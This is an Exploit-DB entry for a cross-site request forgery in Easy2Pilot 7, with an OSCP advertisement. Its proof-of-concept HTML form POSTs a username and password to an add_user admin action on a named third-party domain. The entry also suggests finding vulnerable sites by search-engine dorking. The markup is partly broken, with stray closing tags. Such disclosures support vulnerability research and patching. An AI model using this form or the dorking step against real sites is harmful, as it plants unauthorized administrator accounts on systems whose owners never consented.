Easy2Pilot 7 - Cross-Site Request Forgery (Add User)

EDB-ID:

48099

CVE:

N/A




Platform:

PHP

Date:

2020-02-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
# Author: indoushka
# Date: 2020-02-20
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
# Vendor: http://easy2pilot-v7.com/
# CVE: N/A

#poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] save code as poc.html

[+] 

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
</tr>
                    </table>
                <br/><br/>
        <form action="https://immosl.lu/admin.php?action=add_user" method="POST">
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
                <tr>
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
                </tr>
                <tr>
                    <td class="tah11" align="right">Nom d'utilisateur :</td>
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
                </tr>
                <tr>
                    <td class="tah11" align="right">Mot de passe : </td>
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
                </tr>
                <tr>
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
                </tr>
            </table>
        </form><br/><br/>
<div>
	

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================